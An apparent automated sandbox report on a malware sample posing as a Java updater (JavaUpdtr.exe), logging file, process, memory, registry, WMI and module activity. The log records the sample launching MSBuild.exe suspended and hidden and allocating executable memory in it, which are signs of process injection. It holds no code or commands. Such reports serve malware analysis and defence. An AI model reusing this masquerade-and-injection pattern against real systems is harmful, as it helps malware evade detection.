0x 724
0x 730
0x 734
Host Behavior
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp type = file_type True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 64 True 1
Fn
Data
Process (4)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe os_pid = 0x708, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Enumerate Processes - - True 1
Fn
Open c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe desired_access = PROCESS_TERMINATE True 1
Fn
Terminate c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe exit_code = 4294967295 True 1
Fn
Thread (1)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe os_tid = 0x4ec True 1
Fn
Memory (2)
»
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 False 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 2130567176, size = 4 True 1
Fn
Data
Module (578)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 8
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 8
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 2
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Process #8: msbuild.exe
0 0
»
Information Value
ID #8
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x708
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 70C
Process #9: msbuild.exe
182 9
»
Information Value
ID #9
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration 00:00:29
OS Process Information
»
Information Value
PID 0x718
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 71C
0x 728
0x 72C
0x 7B8
0x 7C4
0x 7C8
0x 7CC
0x 5FC
0x 670
0x 674
0x 650
0x 4EC
0x 4E8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x005B0000 0x005B0FFF First Execution - 32-bit 0x005B0C1C, 0x005B09C4, ... False False
...
Host Behavior
COM (13)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 2
Fn
Create WbemDefaultPathParser IWbemPath cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Fn
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
File (21)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config type = file_attributes True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_type True 2
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 237 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 559 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 0 True 1
Fn
Registry (31)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Impersonation Level, data = 3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace, data = 114 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductId, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module (56)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\advapi32.dll base_address = 0x75db0000 True 1
Fn
Load C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll base_address = 0x6a310000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75a40000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = DuplicateTokenEx, address_out = 0x75dbca24 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Clone, address_out = 0x6a311aa2 True 2
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Get, address_out = 0x6a311b96 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Put, address_out = 0x6a311b7a True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Delete, address_out = 0x6a311bb5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Next, address_out = 0x6a311bf7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
